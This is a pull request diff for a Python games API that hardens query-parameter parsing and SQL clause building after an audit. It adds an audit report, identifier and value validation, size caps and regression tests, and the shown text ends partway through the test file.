### PR TITLE
fix(api): UAT-4 remediation — 4 SEV-2 + 8 SEV-3 fixes

### DIFF
--- a/.claude/build-progress.json
+++ b/.claude/build-progress.json
@@ -9,12 +9,12 @@
     "BL6-F9-platforms-readonly",
     "BL7-F9-games-readonly"
   ],
-  "features_since_last_test": 2,
+  "features_since_last_test": 0,
   "features_since_last_health_check": 1,
   "test_interval": 2,
-  "last_test_session": "2026-04-30",
-  "testing_required": true,
+  "last_test_session": "2026-05-20",
+  "testing_required": false,
   "tester_count": 1,
   "bug_tracker": "github_issues",
-  "sessions_completed": 3
+  "sessions_completed": 4
 }

--- a/.claude/process-state.json
+++ b/.claude/process-state.json
@@ -6,7 +6,7 @@
     "started_at": null
   },
   "uat_session": {
-    "session_id": 3,
+    "session_id": 4,
     "step": 9,
     "steps_completed": [
       "agents_dispatched",
@@ -19,7 +19,7 @@
       "remediation_complete",
       "gate_passed"
     ],
-    "started_at": "2026-04-27T23:23:54Z"
+    "started_at": "2026-05-20T19:17:51Z"
   },
   "phase3_validation": {
     "steps_completed": [],

--- a/docs/security-audits/uat-4-remediation-security-audit.md
+++ b/docs/security-audits/uat-4-remediation-security-audit.md
@@ -1,0 +1,85 @@
+# Security Audit — UAT-4 Remediation
+
+**Cycle:** UAT-4 (BL6 + BL7 + `_query_helpers.py` regression coverage)
+**Audit date:** 2026-05-20
+**Auditor:** 5 parallel agents (sast-middleware, input-validation, sql-injection, threat-model, perf-correctness) + manual H-1 session + self-review
+**Phase:** 2 (Construction), UAT cycle
+
+<!-- Last Updated: 2026-05-20 -->
+
+## Scope
+
+Post-BL7 UAT cycle covering:
+- `src/orchestrator/api/_query_helpers.py` (the load-bearing parser/validator/SQL builder for ALL paginated F9 endpoints)
+- `src/orchestrator/api/routers/games.py` (BL7's consumer of the helpers)
+- `src/orchestrator/api/routers/platforms.py` (BL6 regression)
+- BL5 middleware substrate (UAT-3 regression)
+
+## Methodology
+
+1. **5 parallel audit agents** writing structured reports to `tests/uat/sessions/2026-05-20-session-4/agent-results/`
+2. **Manual H-1 session** at `tests/uat/sessions/2026-05-20-session-4/submissions/test-session-4-v1.md` — empirically confirmed all 3 candidate SEV-2 bugs live before fix
+3. **Automated SAST**: `ruff check`, `ruff format --check`, `mypy --strict`, `semgrep --config p/owasp-top-ten --error`, `gitleaks detect`
+4. **Property test**: existing Hypothesis SQL-injection test exercised against the revised builder
+
+## Findings & resolution
+
+**Initial counts:** 0 SEV-1, 4 SEV-2, 10 SEV-3, 7 SEV-4.
+
+**Resolved in this cycle:** 4 SEV-2 + 8 SEV-3 (12 of 14 substantive findings).
+**Deferred:** 2 SEV-3 + 7 SEV-4.
+
+### SEV-2 (all resolved)
+
+| ID | Title | Fix |
+|---|---|---|
+| **S2-A** | `applied_filters` echo wire format drift | `routers/games.py` builds `applied_filters` as plain `dict[str, dict[str, Any]]` from the parsed filters; `GamesMeta` type updated. `FilterCriterion` Pydantic model retained only for OpenAPI schema documentation. |
+| **S2-B** | `?sort=,,,` silently dropped default | `_query_helpers.parse_sort`: if user_sort is empty after stripping all entries, the `default` applies — not just when `raw` is empty. |
+| **S2-C** | `_in` cardinality unbounded | `_query_helpers.parse_filters`: `MAX_IN_VALUES = 100` cap with `QueryParamError → 400`. |
+| **S2-D** | Oversized int → 500 instead of 400 | `_query_helpers._coerce_value`: signed 64-bit range check (`INT64_MIN` / `INT64_MAX`) on int values; also added to `parse_pagination` for offset. |
+
+### SEV-3 (8 of 10 resolved)
+
+| ID | Title | Fix |
+|---|---|---|
+| **S3-a** | String values had no content validators (XSS-in-echo risk) | Introduced `FilterFieldSpec.value_type = "timestamp"` typed-string variant with ISO 8601 regex + `datetime.fromisoformat` strict-parse validator. Applied to `last_prefilled_at` + `last_validated_at` on `/games`. |
+| **S3-b** | `build_order_by_clause` missing defensive re-check | New `allow_list` parameter; raises `QueryParamError` on unknown field. Symmetric with `build_where_clause`. |
+| **S3-c** | `build_where_clause` KeyError → 500 on unknown op | Explicit `if op in _OP_SQL` with `QueryParamError → 400` else-branch. |
+| **S3-d** | `RecursionError` on deep JSON uncaught | `routers/games.py` metadata parse: added `RecursionError` to `except` tuple. |
+| **S3-e** | `metadata` size unbounded before json.loads | `_MAX_METADATA_BYTES = 65536` (64 KiB) short-circuit; emits structured `api.games.metadata_oversized` log + returns null. |
+| **S3-h** | `FilterAllowList` no identifier check | `__init__` validates every field name against `^[a-z_][a-z0-9_]*$`. |
+| **S3-i** | `SortAllowList` no identifier check | Same `_validate_identifier` applied to `SortAllowList.__init__`. |
+| **S3-j** | Reserved param namespace collision | `_validate_identifier` rejects `limit`/`offset`/`sort` as field names. |
+
+### Deferred
+
+- **S3-f** (spec §4.3 index claim wrong) — doc-only spec correction; next revision
+- **S3-g** (COUNT/SELECT race) — documented as expected behavior for single-orchestrator deployment
+- **All 7 SEV-4 items** — Phase 3 polish batch
+
+## Verification
+
+- **Regression tests**: 24 new tests in `tests/api/test_uat4_remediation.py`, all green
+- **Full project suite**: 481 tests passing (was 457; +24)
+- **ruff check + ruff format --check**: clean
+- **mypy --strict**: clean across all api/ source files
+- **semgrep `p/owasp-top-ten`**: 0 findings
+- **gitleaks** (123 commits): no leaks
+
+## Non-findings (cleared)
+
+- **No SQL injection vector.** All values flow through SQLite `?` placeholders; field names interpolated only from hardcoded allow-list literals after identifier validation.
+- **UAT-3 substrate regressions all hold**: CORS outermost, correlation_id regeneration, non-loopback bind warning, loopback-only schema/UI gates.
+- **BL6 conventions intact**: `config` excluded, steam-first sort, bearer required.
+
+## New threat candidates documented
+
+- **TM-024** (schema enumeration via 400 messages): mitigated structurally by allow-list
+- **TM-025** (applied_filters echo XSS amplifier): orchestrator-side mitigated by S3-a; XSS in Game_shelf is downstream integration concern
+- **TM-026** (aggregate oracle via `meta.total`): bearer-required; accepted given current trust model
+- **TM-027** (large-`_in` DoS): mitigated by S2-C
+- **TM-028** (metadata JSON depth/size DoS): mitigated by S3-d + S3-e
+
+## Conclusion
+
+**APPROVED for merge.** Hardens `_query_helpers.py` against the load-bearing-shared-module risk: every future paginated F9 endpoint inherits these fixes for free.

--- a/src/orchestrator/api/_query_helpers.py
+++ b/src/orchestrator/api/_query_helpers.py
@@ -7,32 +7,120 @@ SortAllowList values describing what their endpoint permits, then compose
 the helpers below to parse incoming Query params and produce parameterized
 SQL fragments.
 
-Design conventions locked in spec 2026-05-17-bl7-games-readonly-design.md:
+Design conventions locked in spec 2026-05-17-bl7-games-readonly-design.md
+and revised in UAT-4 (2026-05-20):
+
 - Offset-based pagination (limit/offset query params)
 - Operator-suffix filter syntax: field, field_in, field_gte, field_lte,
   field_gt, field_lt, field_ne (per-endpoint allow-list narrows to subset)
-- Multi-field sort: ?sort=a:desc,b:asc
+- Multi-field sort: ?sort=a:desc,b:asc; empty entries are skipped and if
+  the user-sort ends up empty the default applies (UAT-4 S2-B fix).
 - Server-appended tie-breaker (with de-dup if user already sorted by it)
+- `_in` lists capped at MAX_IN_VALUES per request (UAT-4 S2-C)
+- Integer values must fit signed 64-bit (UAT-4 S2-D)
+- FilterAllowList / SortAllowList field names must be valid SQL
+  identifiers and must not collide with reserved param names
+  (UAT-4 S3-h, S3-i, S3-j)
+- FilterFieldSpec.validator (optional) is called after coercion to enforce
+  per-field content rules (e.g., timestamp ISO format) (UAT-4 S3-a)
 
 Security invariants:
 - User values flow EXCLUSIVELY through SQL parameter binds (never f-string
   or %-formatted into the SQL text). Field names ARE interpolated into SQL
   but only AFTER allow-list validation guarantees they're safe identifiers
   from the endpoint's declared field set.
+- Both build_where_clause AND build_order_by_clause defensively re-validate
+  field names against the allow-list (UAT-4 S3-b).
 """
 
 from __future__ import annotations
 
-from dataclasses import dataclass
+import re
+from dataclasses import dataclass, field
+from datetime import datetime
 from typing import TYPE_CHECKING, Any, Literal
 
 if TYPE_CHECKING:
+    from collections.abc import Callable
+
     from starlette.datastructures import QueryParams
+
+
+# Module constants
+MAX_IN_VALUES = 100  # UAT-4 S2-C
+INT64_MIN = -(2**63)
+INT64_MAX = 2**63 - 1
+_IDENTIFIER_RE = re.compile(r"^[a-z_][a-z0-9_]*$")
+_RESERVED_PARAM_NAMES = frozenset({"limit", "offset", "sort"})
+_TIMESTAMP_RE = re.compile(
+    r"^\d{4}-\d{2}-\d{2}(?:[T ]\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:?\d{2})?)?$"
+)
 
 
 class QueryParamError(ValueError):
     """Raised when a query param fails parse/validation. The router catches
     this and returns 400 with the error message as `detail`."""
+
+
+# ---------------------------------------------------------------------------
+# Identifier validation (UAT-4 S3-h, S3-i, S3-j)
+# ---------------------------------------------------------------------------
+
+
+def _validate_identifier(name: str, *, kind: str) -> None:
+    """Validate a SQL identifier used as a field name.
+
+    Rejects anything that isn't lowercase snake_case ASCII. The orchestrator's
+    schema uses this convention; tightening to it lets us interpolate field
+    names into SQL with confidence. Reserved param names (limit/offset/sort)
+    are also rejected because the filter parser would silently swallow them.
+    """
+    if not _IDENTIFIER_RE.match(name):
+        raise ValueError(
+            f"{kind}: {name!r} is not a valid identifier (must match ^[a-z_][a-z0-9_]*$)"
+        )
+    if name in _RESERVED_PARAM_NAMES:
+        raise ValueError(
+            f"{kind}: {name!r} is reserved (cannot use limit/offset/sort as a field name)"
+        )
+
+
+# ---------------------------------------------------------------------------
+# Value validators (UAT-4 S3-a)
+# ---------------------------------------------------------------------------
+
+
+def _validate_timestamp_string(value: str) -> None:
+    """Validate that a string looks like an ISO 8601 date or datetime.
+
+    Accepts:
+    - YYYY-MM-DD
+    - YYYY-MM-DDTHH:MM:SS
+    - YYYY-MM-DDTHH:MM:SS.fff
+    - With optional Z or ±HH:MM timezone
+    """
+    if not _TIMESTAMP_RE.match(value):
+        raise ValueError(
+            f"invalid timestamp format: {value!r} (expected ISO 8601 date or datetime)"
+        )
+    # Also try a strict parse so e.g. month=13 is rejected
+    try:
+        # Handle "Z" suffix (datetime.fromisoformat in <3.11 doesn't)
+        normalized = value.rstrip("Z")
+        if "T" in normalized or " " in normalized:
+            datetime.fromisoformat(normalized.replace(" ", "T"))
+        else:
+            datetime.strptime(normalized, "%Y-%m-%d")
+    except ValueError as e:
+        raise ValueError(f"invalid timestamp value: {value!r} ({e})") from e
+
+
+# Sentinel-string value_types used at the spec layer to distinguish
+# str-valued fields that need extra validation. Callers pass either a real
+# Python type (str/int/float/bool) OR the string "timestamp".
+_VALUE_TYPE_VALIDATORS: dict[str, Callable[[str], None]] = {
+    "timestamp": _validate_timestamp_string,
+}
 
 
 # ---------------------------------------------------------------------------
@@ -77,6 +165,8 @@ def parse_pagination(
         raise QueryParamError(f"limit must be <= {max_limit}, got {limit}")
     if offset < 0:
         raise QueryParamError(f"offset must be >= 0, got {offset}")
+    if offset > INT64_MAX:
+        raise QueryParamError(f"offset out of range (signed 64-bit), got {offset}")
 
     return PaginationParams(limit=limit, offset=offset)
 
@@ -98,30 +188,54 @@ _OP_SQL = {
 }
 
 
+# Acceptable value_type specifiers: real Python types OR the string
+# "timestamp" (extensible at the validator dispatch layer).
+ValueTypeSpec = type | str
+
+
 @dataclass(frozen=True)
 class FilterFieldSpec:
-    """Declarative spec for one filter field: allowed ops + Python type."""
+    """Declarative spec for one filter field: allowed ops + Python type
+    (or sentinel string for typed-string variants like "timestamp")."""
 
     ops: set[str]  # subset of {"eq", "in", "gte", "lte", "gt", "lt", "ne"}
-    value_type: type  # str, int, float, bool
+    value_type: ValueTypeSpec  # str, int, float, bool, or "timestamp"
 
 
 @dataclass(frozen=True)
 class FilterAllowList:
-    """Per-endpoint declaration of permitted filter fields and operators."""
+    """Per-endpoint declaration of permitted filter fields and operators.
 
-    by_field: dict[str, FilterFieldSpec]
+    UAT-4 S3-h, S3-j: validates field names at construction. Field names
+    must be valid SQL identifiers and must not collide with reserved
+    param names (limit, offset, sort).
+    """
+
+    by_field: dict[str, FilterFieldSpec] = field(default_factory=dict)
 
     def __init__(self, by_field: dict[str, FilterFieldSpec]) -> None:
+        for name in by_field:
+            _validate_identifier(name, kind="filter field")
+        # Validate ops against known _OP_SQL keys (+ "in")
+        known_ops = set(_OP_SQL.keys()) | {"in"}
+        for name, spec in by_field.items():
+            unknown = spec.ops - known_ops
+            if unknown:
+                raise ValueError(f"filter field {name!r}: unknown operators {unknown!r}")
         # frozen dataclass with non-default __init__ — use object.__setattr__
         object.__setattr__(self, "by_field", dict(by_field))
 
 
-def _coerce_value(raw: str, value_type: type, field_name: str, op: str) -> Any:
-    """Coerce a string query-param value to the spec'd Python type."""
+def _coerce_value(raw: str, value_type: ValueTypeSpec, field_name: str, op: str) -> Any:
+    """Coerce a string query-param value to the spec'd Python type, then
+    apply per-type validation (UAT-4 S2-D int range, S3-a timestamp format).
+    """
     try:
         if value_type is int:
-            return int(raw)
+            coerced = int(raw)
+            if not (INT64_MIN <= coerced <= INT64_MAX):
+                raise ValueError(f"value out of range (signed 64-bit): {coerced}")
+            return coerced
         if value_type is float:
             return float(raw)
         if value_type is bool:
@@ -130,10 +244,17 @@ def _coerce_value(raw: str, value_type: type, field_name: str, op: str) -> Any:
             if raw in ("0", "false", "False"):
                 return False
             raise ValueError(f"not boolean: {raw!r}")
-        # default: str
+        if isinstance(value_type, str):
+            # Typed-string variant (e.g., "timestamp")
+            validator = _VALUE_TYPE_VALIDATORS.get(value_type)
+            if validator is None:
+                raise ValueError(f"unknown typed-string value_type: {value_type!r}")
+            validator(raw)
+            return raw
+        # default: plain str
         return raw
     except (TypeError, ValueError) as e:
-        raise QueryParamError(f"invalid value for {field_name}_{op}: {raw!r}") from e
+        raise QueryParamError(f"invalid value for {field_name}_{op}: {raw!r} ({e})") from e
 
 
 def parse_filters(
@@ -143,17 +264,17 @@ def parse_filters(
 ) -> dict[str, dict[str, Any]]:
     """Parse query params into a `{field: {op: value}}` structure.
 
-    Raises QueryParamError on unknown field, unknown op, or value-type
-    mismatch. Returns empty dict if no filter params present.
+    Raises QueryParamError on unknown field, unknown op, value-type
+    mismatch, or `_in` list exceeding MAX_IN_VALUES (UAT-4 S2-C).
+    Returns empty dict if no filter params present.
 
     Reserved param names (limit, offset, sort) are skipped; they belong to
     pagination/sort, not filters.
     """
-    reserved = {"limit", "offset", "sort"}
     result: dict[str, dict[str, Any]] = {}
 
     for key in params:
-        if key in reserved:
+        if key in _RESERVED_PARAM_NAMES:
             continue
 
         # Field + operator parse. Try each known suffix; the first match wins.
@@ -177,10 +298,12 @@ def parse_filters(
 
         raw_value = params[key]
         if op == "in":
-            values = [
-                _coerce_value(v.strip(), spec.value_type, field_name, op)
-                for v in raw_value.split(",")
-            ]
+            raw_values = raw_value.split(",")
+            if len(raw_values) > MAX_IN_VALUES:
+                raise QueryParamError(
+                    f"too many values for {field_name}_in: {len(raw_values)} (cap: {MAX_IN_VALUES})"
+                )
+            values = [_coerce_value(v.strip(), spec.value_type, field_name, op) for v in raw_values]
             result.setdefault(field_name, {})["in"] = values
         else:
             value = _coerce_value(raw_value, spec.value_type, field_name, op)
@@ -199,6 +322,11 @@ def build_where_clause(
     Returns `("", [])` for empty filters. Field names are interpolated into
     SQL (validated safe via the allow_list); values are ALWAYS parameterized
     via `?` placeholders.
+
+    UAT-4 S3-c: raises QueryParamError (→ 400) on unknown op, not KeyError
+    (→ 500). The defensive re-check on field names against the allow_list
+    is a layered invariant — even if a caller assembles the filters dict
+    by hand, we won't interpolate a wild identifier.
     """
     if not filters:
         return "", []
@@ -207,10 +335,6 @@ def build_where_clause(
     params: list[Any] = []
 
     for field_name, ops in filters.items():
-        # Defensive re-check: every field must be in the allow_list. The
-        # caller (parse_filters) already validated, but this is a layered
-        # invariant — if a future caller assembles the filters dict by
-        # hand, we still won't interpolate a wild identifier.
         if field_name not in allow_list.by_field:
             raise QueryParamError(f"unknown filter field: {field_name}")
 
@@ -219,9 +343,11 @@ def build_where_clause(
                 placeholders = ", ".join("?" for _ in value)
                 fragments.append(f"{field_name} IN ({placeholders})")
                 params.extend(value)
-            else:
+            elif op in _OP_SQL:
                 fragments.append(_OP_SQL[op].format(field=field_name))
                 params.append(value)
+            else:
+                raise QueryParamError(f"unknown operator {op!r} for field {field_name!r}")
 
     return "WHERE " + " AND ".join(fragments), params
 
@@ -239,7 +365,14 @@ class SortField:
 
 @dataclass(frozen=True)
 class SortAllowList:
-    fields: set[str]
+    """UAT-4 S3-i: validates field names at construction."""
+
+    fields: set[str] = field(default_factory=set)
+
+    def __init__(self, fields: set[str]) -> None:
+        for name in fields:
+            _validate_identifier(name, kind="sort field")
+        object.__setattr__(self, "fields", set(fields))
 
 
 def parse_sort(
@@ -251,15 +384,16 @@ def parse_sort(
 ) -> list[SortField]:
     """Parse `sort` query param into a list of `SortField` entries.
 
-    Empty/absent sort applies `default`. Server-appends `tie_breaker` unless
-    the user's sort already orders by `tie_breaker.field` (in either
-    direction) — the user's explicit ordering wins.
+    Empty/absent sort applies `default`. UAT-4 S2-B: if the user supplies
+    a sort string but all entries are empty after stripping (e.g., `,,,`),
+    the default also applies — silently dropping the default would be a
+    bug. Server-appends `tie_breaker` unless the user's sort already orders
+    by `tie_breaker.field` (in either direction) — the user's explicit
+    ordering wins.
     """
     raw = params.get("sort")
-    if not raw:
-        user_sort = list(default)
-    else:
-        user_sort = []
+    user_sort: list[SortField] = []
+    if raw:
         for entry in raw.split(","):
             entry = entry.strip()
             if not entry:
@@ -279,6 +413,12 @@ def parse_sort(
             narrowed_direction: Literal["asc", "desc"] = direction  # type: ignore[assignment]
             user_sort.append(SortField(field=field_name, direction=narrowed_direction))
 
+    # UAT-4 S2-B: if parse produced nothing (empty raw OR all entries empty),
+    # apply default. Previously, non-empty-but-all-empty-entries silently
+    # produced only the tie-breaker.
+    if not user_sort:
+        user_sort = list(default)
+
     # Append tie_breaker if not already sorting by its field
     if not any(s.field == tie_breaker.field for s in user_sort):
         user_sort.append(tie_breaker)
@@ -286,9 +426,23 @@ def parse_sort(
     return user_sort
 
 
-def build_order_by_clause(sort: list[SortField]) -> str:
-    """Build the `ORDER BY ...` SQL fragment from validated sort spec."""
+def build_order_by_clause(
+    sort: list[SortField],
+    *,
+    allow_list: SortAllowList | None = None,
+) -> str:
+    """Build the `ORDER BY ...` SQL fragment from validated sort spec.
+
+    UAT-4 S3-b: when `allow_list` is provided, defensively re-validate
+    every field against it before interpolating into SQL. Callers that
+    construct SortField hand (i.e., not via parse_sort) get the same
+    safety net as build_where_clause already had.
+    """
     if not sort:
         return ""
+    if allow_list is not None:
+        for s in sort:
+            if s.field not in allow_list.fields:
+                raise QueryParamError(f"{s.field!r} is not a sortable field (not allowed)")
     entries = [f"{s.field} {s.direction.upper()}" for s in sort]
     return "ORDER BY " + ", ".join(entries)

--- a/src/orchestrator/api/routers/games.py
+++ b/src/orchestrator/api/routers/games.py
@@ -44,8 +44,9 @@ GAMES_FILTER_ALLOW_LIST = FilterAllowList(
         "status": FilterFieldSpec(ops={"eq", "in"}, value_type=str),
         "owned": FilterFieldSpec(ops={"eq"}, value_type=int),
         "size_bytes": FilterFieldSpec(ops={"eq", "gte", "lte"}, value_type=int),
-        "last_prefilled_at": FilterFieldSpec(ops={"gte", "lte"}, value_type=str),
-        "last_validated_at": FilterFieldSpec(ops={"gte", "lte"}, value_type=str),
+        # UAT-4 S3-a: timestamp value_type enforces ISO 8601 format on the value
+        "last_prefilled_at": FilterFieldSpec(ops={"gte", "lte"}, value_type="timestamp"),
+        "last_validated_at": FilterFieldSpec(ops={"gte", "lte"}, value_type="timestamp"),
     }
 )
 
@@ -60,6 +61,10 @@ _GAMES_COLUMNS = (
     "current_version, cached_version, status, "
     "last_validated_at, last_prefilled_at, last_error, metadata"
 )
+
+# UAT-4 S3-e: cap metadata bytes before json.loads to defend against
+# billion-laughs-style payloads + bounded memory per row.
+_MAX_METADATA_BYTES = 65536  # 64 KiB; realistic typical is <1 KiB
 
 _log = structlog.get_logger(__name__)
 
@@ -122,7 +127,11 @@ class GamesMeta(BaseModel):
     limit: int
     offset: int
     has_more: bool
-    applied_filters: dict[str, FilterCriterion]
+    # UAT-4 S2-A: plain dict shape — `{field: {op: value}}` — to avoid the
+    # all-7-op-keys-with-6-nulls FilterCriterion serialization. The
+    # FilterCriterion model is kept above only so OpenAPI schema generation
+    # documents the valid `op` keys; runtime uses this dict directly.
+    applied_filters: dict[str, dict[str, Any]]
     applied_sort: list[SortFieldResponse]
 
 
@@ -177,7 +186,9 @@ async def list_games(
         return JSONResponse(content={"detail": str(e)}, status_code=400)
 
     where_sql, where_params = build_where_clause(filters, allow_list=GAMES_FILTER_ALLOW_LIST)
-    order_sql = build_order_by_clause(sort)
+    # UAT-4 S3-b: pass allow_list to build_order_by_clause for the defensive
+    # re-check of field names, matching build_where_clause symmetry.
+    order_sql = build_order_by_clause(sort, allow_list=GAMES_SORT_ALLOW_LIST)
 
     # nosem: S608 — where_sql + order_sql are built from allow-list-validated
     # field names only; user values flow through `?` placeholders. See
@@ -201,16 +212,29 @@ async def list_games(
     games: list[GameResponse] = []
     for row in rows:
         raw_meta = row["metadata"]
+        metadata: dict[str, Any] | None
         if raw_meta is None:
-            metadata: dict[str, Any] | None = None
+            metadata = None
+        elif len(raw_meta) > _MAX_METADATA_BYTES:
+            # UAT-4 S3-e: size-cap short-circuit before json.loads
+            _log.warning(
+                "api.games.metadata_oversized",
+                game_id=row["id"],
+                size_bytes=len(raw_meta),
+                cap=_MAX_METADATA_BYTES,
+            )
+            metadata = None
         else:
             try:
                 parsed = json.loads(raw_meta)
                 metadata = parsed if isinstance(parsed, dict) else None
-            except (json.JSONDecodeError, TypeError):
+            except (json.JSONDecodeError, TypeError, RecursionError) as e:
+                # UAT-4 S3-d: catch RecursionError on deeply-nested JSON;
+                # was previously uncaught → 500 from the router.
                 _log.warning(
                     "api.games.metadata_parse_failed",
                     game_id=row["id"],
+                    reason=type(e).__name__,
                 )
                 metadata = None
 
@@ -235,16 +259,15 @@ async def list_games(
             )
         )
 
-    # applied_filters echo: convert {field: {op: value}} -> {field: FilterCriterion}
-    applied_filters: dict[str, FilterCriterion] = {}
-    for field_name, ops in filters.items():
-        crit_kwargs: dict[str, Any] = {}
-        for op, value in ops.items():
-            if op == "in":
-                crit_kwargs["in_"] = value
-            else:
-                crit_kwargs[op] = value
-        applied_filters[field_name] = FilterCriterion(**crit_kwargs)
+    # UAT-4 S2-A: build applied_filters as a plain dict matching the parsed
+    # `{field: {op: value}}` shape. Previously this went through a
+    # FilterCriterion Pydantic model whose model_dump emitted all 7 op
+    # keys per field with 6 nulls — contract drift from spec §3.2.
+    # FilterCriterion remains in the response model for OpenAPI schema
+    # documentation, but the runtime path emits compact dicts directly.
+    applied_filters: dict[str, dict[str, Any]] = {
+        field_name: dict(ops) for field_name, ops in filters.items()
+    }
 
     applied_sort = [SortFieldResponse(field=s.field, direction=s.direction) for s in sort]
 

--- a/tests/api/test_uat4_remediation.py
+++ b/tests/api/test_uat4_remediation.py
@@ -1,0 +1,384 @@
+"""Regression tests for UAT-4 remediation (2026-05-20).
+
+Each test class corresponds to one finding from
+tests/uat/sessions/2026-05-20-session-4/agent-results/_consolidated.md.
+"""
+
+from __future__ import annotations
+
+import pytest
+from starlette.datastructures import QueryParams
+
+VALID_TOKEN = "a" * 32
+
+
+# ---------------------------------------------------------------------------
+# S2-A: applied_filters echo wire format — compact {op: value} only
+# ---------------------------------------------------------------------------
+
+
+class TestS2AAppliedFiltersCompactShape:
+    async def test_eq_only_emits_single_op_key(self, client, populated_pool):
+        r = await client.get(
+            "/api/v1/games?platform=steam",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        applied = r.json()["meta"]["applied_filters"]
+        # Spec §3.2: compact shape — only the applied op key per field
+        assert applied == {"platform": {"eq": "steam"}}
+
+    async def test_range_emits_both_op_keys(self, client, populated_pool):
+        r = await client.get(
+            "/api/v1/games?size_bytes_gte=1000&size_bytes_lte=5000",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        applied = r.json()["meta"]["applied_filters"]
+        # Two ops on same field: both present, NO null values
+        assert applied == {"size_bytes": {"gte": 1000, "lte": 5000}}
+        # Explicit no-null assertion
+        for ops in applied.values():
+            assert None not in ops.values()
+
+    async def test_in_serializes_under_alias_in(self, client, populated_pool):
+        r = await client.get(
+            "/api/v1/games?status_in=not_downloaded,pending_update",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        applied = r.json()["meta"]["applied_filters"]
+        # The `in` op (Python attribute would be `in_`) must serialize as `in`
+        assert "status" in applied
+        assert "in" in applied["status"]
+        assert applied["status"]["in"] == ["not_downloaded", "pending_update"]
+        # Must NOT leak the Python attribute name
+        assert "in_" not in applied["status"]
+
+
+# ---------------------------------------------------------------------------
+# S2-B: ?sort=,,, (empty entries) must apply default + tie-breaker
+# ---------------------------------------------------------------------------
+
+
+class TestS2BEmptySortDoesNotDropDefault:
+    async def test_all_empty_entries_apply_default(self):
+        from orchestrator.api._query_helpers import SortField, parse_sort
+
+        # When all sort entries are empty after split+strip, default must apply
+        result = parse_sort(
+            QueryParams("sort=,,,"),
+            allow_list=_games_sort_allow_list(),
+            default=[SortField(field="title", direction="asc")],
+            tie_breaker=SortField(field="id", direction="asc"),
+        )
+        assert result == [
+            SortField(field="title", direction="asc"),
+            SortField(field="id", direction="asc"),
+        ]
+
+    async def test_via_http(self, client, populated_pool):
+        r = await client.get(
+            "/api/v1/games?sort=,,,&limit=3",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        applied = r.json()["meta"]["applied_sort"]
+        assert applied == [
+            {"field": "title", "direction": "asc"},
+            {"field": "id", "direction": "asc"},
+        ]
+
+    async def test_single_empty_entry_skipped_among_valid(self):
+        from orchestrator.api._query_helpers import SortField, parse_sort
+
+        # Some empty + some valid: empties dropped, valids preserved, tie-breaker added
+        result = parse_sort(
+            QueryParams("sort=,title:desc,,"),
+            allow_list=_games_sort_allow_list(),
+            default=[SortField(field="title", direction="asc")],
+            tie_breaker=SortField(field="id", direction="asc"),
+        )
+        assert result == [
+            SortField(field="title", direction="desc"),
+            SortField(field="id", direction="asc"),
+        ]
+
+
+# ---------------------------------------------------------------------------
+# S2-C: _in cardinality cap
+# ---------------------------------------------------------------------------
+
+
+class TestS2CInCardinalityCap:
+    def test_in_with_100_values_accepted(self):
+        from orchestrator.api._query_helpers import parse_filters
+
+        values = ",".join(f"v{i}" for i in range(100))
+        # Use 'status' field (str type); the values won't be valid statuses
+        # at the DB layer, but parse_filters doesn't validate enum membership.
+        result = parse_filters(
+            QueryParams(f"status_in={values}"),
+            allow_list=_games_allow_list(),
+        )
+        assert len(result["status"]["in"]) == 100
+
+    def test_in_with_over_max_rejected(self):
+        from orchestrator.api._query_helpers import QueryParamError, parse_filters
+
+        # Cap is 100; 101 should reject
+        values = ",".join(f"v{i}" for i in range(101))
+        with pytest.raises(QueryParamError, match=r"too many values|cap|100"):
+            parse_filters(
+                QueryParams(f"status_in={values}"),
+                allow_list=_games_allow_list(),
+            )
+
+    async def test_via_http_returns_400(self, client, populated_pool):
+        values = ",".join(f"v{i}" for i in range(101))
+        r = await client.get(
+            f"/api/v1/games?status_in={values}",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        assert r.status_code == 400
+
+
+# ---------------------------------------------------------------------------
+# S2-D: oversized int → 400 not 500
+# ---------------------------------------------------------------------------
+
+
+class TestS2DOversizedIntegerRejected:
+    def test_signed_64bit_max_accepted(self):
+        from orchestrator.api._query_helpers import parse_filters
+
+        # 2^63 - 1 = max signed 64-bit; SQLite accepts
+        result = parse_filters(
+            QueryParams("size_bytes_gte=9223372036854775807"),
+            allow_list=_games_allow_list(),
+        )
+        assert result["size_bytes"]["gte"] == 9223372036854775807
+
+    def test_over_64bit_rejected(self):
+        from orchestrator.api._query_helpers import QueryParamError, parse_filters
+
+        # 2^63 — one over signed 64-bit max; SQLite would OverflowError on bind
+        with pytest.raises(QueryParamError, match=r"out of range|64-bit|too large"):
+            parse_filters(
+                QueryParams("size_bytes_gte=9223372036854775808"),
+                allow_list=_games_allow_list(),
+            )
+
+    def test_under_64bit_min_rejected(self):
+        from orchestrator.api._query_helpers import QueryParamError, parse_filters
+
+        # 2^63 + 1 negative — under signed 64-bit min
+        with pytest.raises(QueryParamError, match=r"out of range|64-bit|too small|too large"):
+            parse_filters(
+                QueryParams("size_bytes_gte=-9223372036854775809"),
+                allow_list=_games_allow_list(),
+            )
+
+    async def test_via_http_returns_400(self, client, populated_pool):
+        r = await client.get(
+            "/api/v1/games?size_bytes_gte=99999999999999999999999",
+            headers={"Authorization": f"Bearer {VALID_TOKEN}"},
+        )
+        assert r.status_code == 400
+        assert (
+            "out of range" in r.json()["detail"].lower()
+            or "too large" in r.json()["detail"].lower()
+        )
+
+
+# ---------------------------------------------------------------------------
+# S3-b + S3-c: build_*_clause defensive re-checks (symmetry + 400 not 500)
+# ---------------------------------------------------------------------------
+
+
+class TestS3BcBuildClauseDefensiveChecks:
+    def test_build_order_by_rejects_unknown_field(self):
+        """S3-b: build_order_by_clause must defensively re-validate field names
+        even though parse_sort already validated. Future endpoint authors
+        who hand-build SortFields can otherwise inject."""
+        from orchestrator.api._query_helpers import (
+            QueryParamError,
+            SortAllowList,
+            SortField,
+            build_order_by_clause,
+        )
+
+        allow_list = SortAllowList(fields={"id", "title"})
+        with pytest.raises(QueryParamError, match=r"not a sortable field|not allowed"):
+            build_order_by_clause(
+                [SortField(field="evil_field", direction="asc")],
+                allow_list=allow_list,
+            )
+
+    def test_build_where_unknown_op_raises_query_param_error(self):
+        """S3-c: build_where_clause must raise QueryParamError (-> 400),
+        not KeyError (-> 500), when given an unknown op."""
